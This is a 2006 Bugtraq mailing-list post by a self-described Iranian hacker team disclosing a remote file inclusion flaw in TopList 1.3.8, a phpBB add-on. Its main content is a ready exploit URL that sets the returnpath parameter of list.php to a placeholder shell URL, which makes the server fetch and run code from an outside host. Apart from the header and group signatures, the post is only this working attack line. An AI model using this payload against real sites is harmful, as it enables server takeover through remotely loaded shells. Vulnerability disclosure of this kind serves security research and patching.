
Date: 28 Apr 2006 06:13:50 -0000
From: mfoxhacker@...il.com
To: bugtraq@...urityfocus.com
Subject: TopList <= 1.3.8 (PHPBB Hack) Remote File Inclusion Vulnerability


####################################################
# IHST - MFox > MFoxHacker@...il.com               #
####################################################

- Vendor = TopList (PHPBB)
- Target = list.php
- Exploit  :
http://[target]/top/list.php?returnpath=[shell_url]

Bug Discovered by MFox
Special thanks to all of my friendZ
##################################################
# IHST - Iran HackerZ Security Team              #
# irc.governmentsecurity.org #h4ckerz.com        #
# Www.Hackerz.Com - Www.Hackerz.iR               #
##################################################


